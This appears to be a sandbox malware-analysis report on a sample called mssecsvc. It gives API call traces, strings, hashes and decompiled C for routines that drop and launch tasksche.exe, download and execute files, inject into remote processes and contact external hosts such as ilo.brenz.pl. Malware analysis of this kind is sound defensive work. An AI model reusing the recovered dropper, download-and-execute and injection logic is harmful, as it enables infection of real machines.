                    • String ID: C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$\DEVICE\AFD\ENDPOINT
                    • API String ID: 2996464229-3876287451
                    • Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                    • Instruction ID: 9d7a0edf8395d02bdb3222331a00bfe847c5167623d17b4b3927ccf0a8489e01
                    • Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                    • Instruction Fuzzy Hash: 5381FE71508388BFEB228F348C59BEA7BADEF41304F040659E84A9E091C7F66F45C762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B03F60 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 215librarystringthreadCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(00B03F54), ref: 00B03F60
                      • Part of subcall function 00B03F8F: LoadLibraryA.KERNEL32(00B03F83), ref: 00B03F8F
                      • Part of subcall function 00B03F8F: WSAStartup.WS2_32(00000101), ref: 00B03FCE
                      • Part of subcall function 00B03F8F: CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B03FE9
                      • Part of subcall function 00B03F8F: CloseHandle.KERNEL32(?,00000000), ref: 00B03FF2
                      • Part of subcall function 00B03F8F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B03FFF
                      • Part of subcall function 00B03F8F: socket.WS2_32(00000002,00000001,00000000), ref: 00B04097
                      • Part of subcall function 00B03F8F: connect.WS2_32(6F6C6902,00B03B09,00000010), ref: 00B040B1
                      • Part of subcall function 00B03F8F: GetVersionExA.KERNEL32(?,?,00000000), ref: 00B040FB
                    • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00B04057
                    • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00B04066
                    • wsprintfA.USER32 ref: 00B04179
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00B041B4
                    • CloseHandle.KERNEL32(?,00000000,6F6C6902,00B06AA2,00000000,00000000), ref: 00B041BD
                    • GetTickCount.KERNEL32 ref: 00B041F6
                    Strings
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
                    • String ID: C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$\DEVICE\AFD\ENDPOINT
                    • API String ID: 2996464229-3876287451
                    • Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                    • Instruction ID: 3742f42243748dd9207c2b4828354a434c13bb300a0f547106572c9e8aa24cf9
                    • Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
                    • Instruction Fuzzy Hash: 2D81EEB1518258BEEB219F24885DBEA7FECEF41300F044598E9499E0C2D7F45F4587A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA388E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127networksleeptimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTime.KERNEL32(7FEA7584), ref: 7FEA389F
                    • Sleep.KERNEL32(0000EA60), ref: 7FEA3911
                    • InternetGetConnectedState.WININET(?,00000000), ref: 7FEA392A
                    • gethostbyname.WS2_32(0D278125), ref: 7FEA396C
                    • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA3981
                    • ioctlsocket.WS2_32(?,8004667E), ref: 7FEA399A
                    • connect.WS2_32(?,?,00000010), ref: 7FEA39B3
                    • Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 7FEA39C1
                    • closesocket.WS2_32 ref: 7FEA3A20
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
                    • String ID: uqghqa.com
                    • API String ID: 159131500-3379764604
                    • Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                    • Instruction ID: 863d8d36320b09296de0ef8eaaf11b1bc77ac7fb125708de1e92797cd0aa2464
                    • Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                    • Instruction Fuzzy Hash: 4641C531604348BEDB218F208C49BE9BB6EEF85714F004159F90AEE1C1DBF79B409720
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA07AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 7FEA144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FEA145A
                      • Part of subcall function 7FEA144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FEA146A
                    • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                    • FreeLibrary.KERNEL32(76EF0000,?,7FEA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA07B8
                    • CloseHandle.KERNEL32(?,?,7FEA079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA07BF
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 7FEA07C9
                    • Process32First.KERNEL32 ref: 7FEA07DC
                    • Process32Next.KERNEL32 ref: 7FEA07ED
                    • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA0805
                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FEA0842
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA085D
                    • CloseHandle.KERNEL32 ref: 7FEA086C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
                    • String ID: csrs
                    • API String ID: 3908997113-2321902090
                    • Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                    • Instruction ID: 84bb5cd5c05f80c9023c3546aa49ac891d3b4ee2c4a24ef2c536b510610674c9
                    • Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                    • Instruction Fuzzy Hash: 59113D30502205BBEB255F31CD49BBF3A6DEF44711F00016CFE4B9E081DAB69B018AAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA2768 Relevance: 12.1, APIs: 8, Instructions: 85networkCOMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathA.KERNEL32(00000104), ref: 7FEA278C
                      • Part of subcall function 7FEA27A7: GetTempFileNameA.KERNEL32(?,7FEA27A3,00000000,?), ref: 7FEA27A8
                      • Part of subcall function 7FEA27A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27C3
                      • Part of subcall function 7FEA27A7: InternetReadFile.WININET(?,?,00000104), ref: 7FEA27DD
                      • Part of subcall function 7FEA27A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27F3
                      • Part of subcall function 7FEA27A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27FF
                      • Part of subcall function 7FEA27A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FEA27A3), ref: 7FEA2823
                      • Part of subcall function 7FEA27A7: InternetCloseHandle.WININET(?), ref: 7FEA2833
                    • InternetCloseHandle.WININET(00000000), ref: 7FEA283A
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
                    • String ID:
                    • API String ID: 1995088466-0
                    • Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                    • Instruction ID: c1ca02f886126752e6f21441145c1cc666a01a53b77e18b91c733c89828b9d16
                    • Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                    • Instruction Fuzzy Hash: A821C0B1145306BFE7215A20CC8AFFF3A6DEF95B10F000119FA4AAD081D7B29B15C6A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B02768 Relevance: 12.1, APIs: 8, Instructions: 85networkCOMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathA.KERNEL32(00000104), ref: 00B0278C
                      • Part of subcall function 00B027A7: GetTempFileNameA.KERNEL32(?,00B027A3,00000000,?), ref: 00B027A8
                      • Part of subcall function 00B027A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00B027A3,00000000,?), ref: 00B027C3
                      • Part of subcall function 00B027A7: InternetReadFile.WININET(?,?,00000104), ref: 00B027DD
                      • Part of subcall function 00B027A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00B027A3,00000000,?), ref: 00B027F3
                      • Part of subcall function 00B027A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,00B027A3,00000000,?), ref: 00B027FF
                      • Part of subcall function 00B027A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00B027A3), ref: 00B02823
                      • Part of subcall function 00B027A7: InternetCloseHandle.WININET(?), ref: 00B02833
                    • InternetCloseHandle.WININET(00000000), ref: 00B0283A
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
                    • String ID:
                    • API String ID: 1995088466-0
                    • Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                    • Instruction ID: 2fff0ff5af8c6465178c1c561c4d0f8c3a67871aa8ea1ef7c45b64e975e68631
                    • Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
                    • Instruction Fuzzy Hash: 8821DCB1144206BFE7215B20CC8EFEB3E6CEF95B00F000168FA09890C2D7B19E0986A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA27A7 Relevance: 12.1, APIs: 8, Instructions: 65filenetworkprocessCOMMON
                    Download Yara Rule
                    APIs
                    • GetTempFileNameA.KERNEL32(?,7FEA27A3,00000000,?), ref: 7FEA27A8
                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27C3
                    • InternetReadFile.WININET(?,?,00000104), ref: 7FEA27DD
                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27F3
                    • CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FEA27A3,00000000,?), ref: 7FEA27FF
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FEA27A3), ref: 7FEA2823
                    • InternetCloseHandle.WININET(?), ref: 7FEA2833
                    • InternetCloseHandle.WININET(00000000), ref: 7FEA283A
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
                    • String ID:
                    • API String ID: 3452404049-0
                    • Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                    • Instruction ID: 5e72b063bb693ddb0cec3f1fad15b0eca3dde0b314aeb166be0943229ddb0145
                    • Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                    • Instruction Fuzzy Hash: 56116DB1100606BBEB250B20CC4AFFB7A6DEF85B14F004519FA06AD080DBF5AB5196A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B0116F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 231libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(00B01162,00B00796,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B0116F
                      • Part of subcall function 00B01196: GetProcAddress.KERNEL32(00000000,00B01180), ref: 00B01197
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: 13i)$\itatVt
                    • API String ID: 2574300362-2541380276
                    • Opcode ID: ef1c02a20ae2fe7b2610488eb63e9b94eb073bcd6a047e20706c38331bd00a3c
                    • Instruction ID: 6b76abf3043018188ab4131f4f48b2ebe36e306b94786e913a1f9019d870e410
                    • Opcode Fuzzy Hash: ef1c02a20ae2fe7b2610488eb63e9b94eb073bcd6a047e20706c38331bd00a3c
                    • Instruction Fuzzy Hash: AC71456251C6C26FDB1B86388DAB5C9FFE0FA127A034C8ADEC4C15B9C3D7589513C286
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA10CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(01E2F8E4), ref: 7FEA113D
                    • GetProcAddress.KERNEL32(00000000,7FEA11D6), ref: 7FEA1148
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: .DLL
                    • API String ID: 1646373207-899428287
                    • Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                    • Instruction ID: 2f73ade5318114d7e9bf37e66f68aeb85e6b2a503a621854e5f62f64a3af89c8
                    • Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                    • Instruction Fuzzy Hash: D701D634607104EACB538E38C845BFE3B7EFF14275F004115D91A8F159C77A9A508F95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B010CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(01E2F8E4), ref: 00B0113D
                    • GetProcAddress.KERNEL32(00000000,00B011D6), ref: 00B01148
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: .DLL
                    • API String ID: 1646373207-899428287
                    • Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                    • Instruction ID: c3d0a0a9aaca42a511bcd59da19942ef0d532df52aeb98cf39af17153e687186
                    • Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
                    • Instruction Fuzzy Hash: D6019630607005FADF6D9E6CC889BAA3FEDFF08351F104994EA1A9B1D6C7B0CE508695
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:71.8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:37
                    Total number of Limit Nodes:9

                    Callgraph

                    Executed Functions

                    Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175libraryloaderfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 86%
                    			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				struct _STARTUPINFOA _v588;
				struct _PROCESS_INFORMATION _v604;
				long _v608;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				void* _t50;
				int _t59;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					 *0x43144c = _t36;
					if( *0x431478 != 0) {
						_t121 =  *0x431458; // 0x7705f7b0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x7705fc30
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1); // executed
												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
												_t107 = _t50;
												if(_t107 != 0xffffffff) {
													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
													FindCloseChangeNotification(_t107); // executed
													_v604.hThread = 0;
													_v604.dwProcessId = 0;
													_v604.dwThreadId = 0;
													memset( &(_v588.lpReserved), 0, 0x10 << 2);
													asm("repne scasb");
													_v604.hProcess = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v520 - 1, _t108, 0 << 2);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_v588.cb = 0x44;
													_v588.wShowWindow = 0;
													_v588.dwFlags = 0x81;
													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
													if(_t59 != 0) {
														CloseHandle(_v604.hThread);
														CloseHandle(_v604);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}






















                    0x00407cf5
                    0x00407cfb
                    0x00407d15
                    0x00407d22
                    0x00407d2f
                    0x00407d34
                    0x00407d3c
                    0x00407d43
                    0x00407d49
                    0x00407d4f
                    0x00407d55
                    0x00407d5b
                    0x00407d7a
                    0x00407d7e
                    0x00407d86
                    0x00407d8e
                    0x00407d95
                    0x00407d9d
                    0x00407da1
                    0x00407daf
                    0x00407db3
                    0x00407dc4
                    0x00407dc8
                    0x00407dca
                    0x00407dcc
                    0x00407ddb
                    0x00407de2
                    0x00407def
                    0x00407df1
                    0x00407e01
                    0x00407e18
                    0x00407e2c
                    0x00407e43
                    0x00407e49
                    0x00407e4e
                    0x00407e61
                    0x00407e68
                    0x00407e72
                    0x00407e7a
                    0x00407e82
                    0x00407e8b
                    0x00407e95
                    0x00407e9b
                    0x00407e9f
                    0x00407ea8
                    0x00407eb0
                    0x00407ebc
                    0x00407ed3
                    0x00407edb
                    0x00407ee0
                    0x00407ee8
                    0x00407ef0
                    0x00407ef7
                    0x00407f02
                    0x00407f02
                    0x00407ef0
                    0x00407e4e
                    0x00407db3
                    0x00407da1
                    0x00407d8e
                    0x00407d7e
                    0x00407d5b
                    0x00407d4f
                    0x00407d43
                    0x00407f14

                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F75FB10,?,00000000), ref: 00407CEF
                    • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                    • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                    • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                    • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                    • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                    • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                    • sprintf.MSVCRT ref: 00407E01
                    • sprintf.MSVCRT ref: 00407E18
                    • MoveFileExA.KERNEL32 ref: 00407E2C
                    • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                    • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
                    • CreateProcessA.KERNELBASE ref: 00407EE8
                    • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                    • CloseHandle.KERNEL32(08000000), ref: 00407F02
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.471579599.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.471569497.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471607605.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471642720.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471671860.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471818802.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000006.00000002.473832728.0000000000A71000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
                    • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                    • API String ID: 1541710770-1507730452
                    • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                    • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                    • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                    • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 71%
                    			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}
























                    0x00409a19
                    0x00409a1b
                    0x00409a20
                    0x00409a2b
                    0x00409a2c
                    0x00409a39
                    0x00409a3e
                    0x00409a43
                    0x00409a4a
                    0x00409a51
                    0x00409a64
                    0x00409a72
                    0x00409a7b
                    0x00409a80
                    0x00409a85
                    0x00409a8b
                    0x00409a92
                    0x00409a98
                    0x00409a99
                    0x00409a9e
                    0x00409aa3
                    0x00409aa8
                    0x00409ab2
                    0x00409acb
                    0x00409ad1
                    0x00409ad6
                    0x00409adb
                    0x00409ae8
                    0x00409aea
                    0x00409af0
                    0x00409b2c
                    0x00409b31
                    0x00409b32
                    0x00409b32
                    0x00409af2
                    0x00409af2
                    0x00409af2
                    0x00409af3
                    0x00409af6
                    0x00409af8
                    0x00409b03
                    0x00409b05
                    0x00409b05
                    0x00409b06
                    0x00409b06
                    0x00409b03
                    0x00409b09
                    0x00409b0d
                    0x00000000
                    0x00000000
                    0x00409b13
                    0x00409b1a
                    0x00409b24
                    0x00409b39
                    0x00409b26
                    0x00409b26
                    0x00409b26
                    0x00409b3a
                    0x00409b3b
                    0x00409b3c
                    0x00409b44
                    0x00409b45
                    0x00409b4a
                    0x00409b4e
                    0x00409b54
                    0x00409b59
                    0x00409b5b
                    0x00409b5e
                    0x00409b5f
                    0x00409b60
                    0x00409b67

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.471607605.0000000000409000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.471569497.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
